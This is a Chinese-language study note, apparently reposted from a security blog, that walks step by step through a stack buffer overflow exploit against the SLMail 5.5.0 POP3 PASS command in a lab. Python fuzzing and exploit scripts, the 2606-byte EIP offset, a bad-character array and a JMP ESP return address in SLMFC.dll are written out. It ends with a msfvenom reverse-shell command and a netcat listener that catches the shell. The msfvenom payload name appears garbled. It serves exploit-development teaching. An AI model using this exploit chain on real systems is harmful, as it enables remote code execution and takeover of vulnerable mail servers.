首页 > 其他分享 >学习笔记- SLMail 溢出案例

学习笔记- SLMail 溢出案例

时间:2022-11-02 18:57:14浏览次数:65  
标签:2606 SLMail buffer py slmail pop3 python 笔记 溢出

SLMail 溢出案例


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


环境

  • win7
  • SLMail 版本5.5.0
  • ImmunityDebugger 版本1_85

payload

pop3-pass-fuzz.py

#!/usr/bin/python
# -*- encoding: utf-8 -*-
import socket

#创建一个缓冲区数组,同时递增它们.

buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print "Fuzzing PASS with %s bytes"%len(string)
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect=s.connect(('192.168.30.35',110))
    s.recv(1024)
    s.send('USER test\r\n')
    s.recv(1024)
    s.send('PASS ' + string + '\r\n')
    s.send('QUIT\r\n')
    s.close()

开始

以管理员权限运行 SLMail 和 Immunity Debugger

在 Immunity Debugger Attach --> SLMail

  • 更改字体设置:右侧2个窗口任意一处右击-Appearance-font(all)-OEM fixed font
  • 更改显示:下方左侧右击-Hex-Hex/ASCII(16bytes)

点击上方开始按钮后,在 kail 机运行 python pop3-pass-fuzz.py 脚本

大概跑到 2900 byte 时 debugger 显示 access violation when executing [41414141]-use Shift+F7/F8/F9 to pass exception to program 时,记录下此时的字节数,观察 EBP 和 EIP 的值,已被 A(41) 填充

image

在 ESP 上右击 Follow in Dump,跳到内存查看


进一步测试

关闭 debugger,重启 slmail 服务

slmail-pop3.py

#!/usr/bin/python
# -*- encoding: utf-8 -*-

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = 'A' * 2700

try:
    print "\nSending evil buffer..."
    s.connect(('192.168.30.35',110))
    data = s.recv(1024)
    s.send('USER username' +'\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    print "Could not connect to POP3!"

打开 Immunity Debugger Attach-SLMail,开始在 kail 机运行: python slmail-pop3.py 出现提示信息后,此时 EIP 也被 A 填充

使用 msf-pattern_create 模块,生成 2700 个字节的字符串: msf-pattern_create -l 2700

用生成的字符串去替换 slmail-pop3.py 脚本的 buffer 参数

重启 slmail 服务后运行脚本 python slmail-pop3.py

读出 EIP 的填充值,去生成的字符串中检索: msf-pattern_offset -q 39694438

Exact match at offset 2606

将 slmail-pop3.py 的 buffer 替换成: buffer = "A" * 2606 + "B" * 4 + "C" * (2700-2606-4)

重启 slmail 服务运行脚本 python slmail-pop3.py
可以观察到,EIP 的值已被 B(42) 填充

image

通常 shellcode 包含 350-400 个字节

重启 slmail 服务,将 slmail-pop3.py 的 buffer 替换成: buffer = "A" * 2606 + "B" * 4 + "C" * (3500-2606-4)

python slmail-pop3.py 观察到 EIP 仍被 B 填充,对 ESP 进行 Follow in Dump,发现其已被填充成 C(43) 算出此时栈中能利用的最大字节数: 0xA2D0 - 0xA128 = 0x1A8 = 424

发送从 0x00-0xff 字符来找出 bad char,通常情况下,0x00 都是 bad char

重启 slmail 服务,修改 payload 脚本如下

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

buffer = "A" * 2606 + "B" * 4 + badchars

运行脚本 python slmail-pop3.py 在 debugger 中 follow esp in dump

找出其中一个 bad char 之后,修改 badchars 变量,继续测试: 重启 slmail 服务和 debugger, python slmail-pop3.py , follow esp in dump 重复上述步骤,直到找出所有的 bad chars

\x00
\x0a
\x0d

找 DLL

下载 mona, https://github.com/corelan/mona 将 mona.py 拖放到"PyCommands"文件夹中(在 Immunity Debugger 应用程序文件夹中).

在 c:\python27 中安装 Python 2.7.14(或更高版本的 2.7.xx),从而覆盖与 Immunity 捆绑在一起的版本.尝试更新 mona 时需要这样做以避免 TLS 问题.确保正确安装 32 位版本的 python.

!mona modules 查看所有的模块

其中 Rebase 表示重启后是否会改变地址,False 即不改变;SafeSEH、ASLR、NXCompat 这三项都是 Windows 相关的安全机制;OS Dll 表示是否是 OS 自带的库;即前四列选 False,最后一列选 True

  • 切换到上方的 m 模块,继续筛选出有执行权限的 dll(R E)
  • 再依次切换到满足上述条件的 dll 中查找是否存在所需指令:

image

  • 右击-Search for-command jmp esp

  • 右击-Search for-Sequence of commands

    push esp
    retn
    
  • 如果上述无法找到,找该命令对应的十六进制数,下面调用 msf 中的模块:

    msf-nasm_shell
    nasm > jmp esp
    00000000 FFE4                       jmp esp
    
  • 对每个找到的 dll 执行: !mona find -s "\xff\xe4" -m xxx.dll

  • 确定对应的模块: C:\windows\system32\SLMFC.dll

  • 点上方的 e,会显示所有被 slmail.exe 加载的 dll 文件,找到 SLMFC.dll 后,双击,加载成功后,上方标题栏会变成[thread xxxxx,module SLMFC]


  • 上方切换到 k 模块,在下方输入: !mona find -s "\xff\xe4" -m slmfc.dll
  • 在找到的结果中,筛选没有 bad char 的项
  • 点击上方最右边的向右箭头-输入内存地址(5F4A358F)-右击-copy to clipnoard

  • 修改 py 脚本: buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * (3500-2606-4)
  • 重启 slmail 服务和 debugger,跳到 (5F4A358F) 内存处,F2 设置断点
  • python slmail-pop3.py,可以观察到此时程序停在了(5F4A358F)处,右击 follow esp in dump,查看栈中的数据
  • F7 单步调试,进入 jmp esp 中,观察到程序执行的代码段,全是 C

重启 slmail 服务和 debugger,使用 msfvenom 生成 shell code payload:

msfvenom -p windows/shell_Pwn_tcp LHOST=192.168.30.5 LPORT=4433 -f c -a x86 --platform windows -b "\x00\x0a\x0d"(找到的bad char) -e x86/shikata_ga_nai

会得到一串 shell code: unsigned char buf[] = "xxxx..."

修改 py 脚本

shellcode = ("xxx...")

# \x90指的是nop,这里填写16个字节是为了容错,防止ESP寄存器起始的字节丢失而造成shellcode不能正常执行的情况.

buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C" * (3500-2606-4-351-16)

在 jmp esp 的内存地址处 F2 设置断点,python slmail-pop3.py,在断点处 F7 进行单步调试,把第八个 nop 处的值修改成 int3(函数中断),然后 F7 继续执行,到循环处,观察内存中的 shell code 解码,在 CLD 处 F2 添加断点,观察全部解码后的内存空间

在 kail 机进行侦听: nc -lvp 4433 可以看到有回弹 shell 连接过来

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

标签:2606,SLMail,buffer,py,slmail,pop3,python,笔记,溢出
From: https://www.cnblogs.com/haidragon/p/16852018.html

相关文章

  • 学习笔记-PWN
    PWN相关工具pwntools如何验证pwntools安装成功python进入交互,导入pwn库,出现如下字符证明pwntools安装成功python3>>>frompwnimport*>>>asm("xoreax,......
  • 学习笔记-Aircrack
    Aircrack免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.简介aircrack是一个比较出名的用于破解......
  • 尚品汇笔记(前台-day2)
    犯的错误:1:项目阶段,左侧菜单目录,只能有项目文件夹2:联想电脑安装node_modules依赖包的时候,经常丢包。npminstall--saveaxios--force3:单词错误4:路由理解KV:K--->UR......
  • Stata笔记
    matlist与matlist的区别:matlistisanextensionofthematrixlistcommand。`matlist`有更多的控制选项,可以更多地改变矩阵的展示方式。`matlist`只能打印一个......
  • Mongodb修改oplog大小--笔记
    MongoDB3.6之前oplog修改需要重启实例到非副本单实例模式,3.6开始可以使用命令replSetResizeOplog在线修改副本集成员的oplog大小。修改方式为:先修改从secondary节点开,然后......
  • 软件技术基础学习笔记(2)——独立完成一个项目
    软件技术基础学习笔记(2)——独立完成一个项目这个作业属于哪个课程<首页-22软件基础-浙江理工大学-班级博客-博客园>这个作业的目标<在限定的期限内,完成......
  • Springcloud学习笔记51--@Configuration+@Bean实现自动化装配,解决第三方jar中类bean交
    1.@Configuration+@Bean编写配置类此时,第三方类为DataSource;/***@Authorlucky*@Date2022/4/19:18*配置数据库连接池,注入DataSource*/@Configurationpub......
  • 【已解决】Git踩坑笔记[! [remote rejected] main -> main (pre-receive hook decline
    踩坑今天使用gitlab踩坑了目的是要将代码上传到公司gitlab中,组长给我创建好了仓库,但是没有初始化仓库。我需要将本地代码上传上去,老操作,先在本地代码的目录打开gitbash,......
  • 算法学习笔记11.02
    第一章基础算法(三)双指针算法可以是两个指针分别指向两个序列,也可以是两个指针指向一个序列,维护一段区间核心思想:将O(n2)优化到O(n)最长连续不重复子序列最长的不......
  • 学习笔记-XSS
    XSS免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.相关文章XSS插入绕过一些方式总结XSS总结......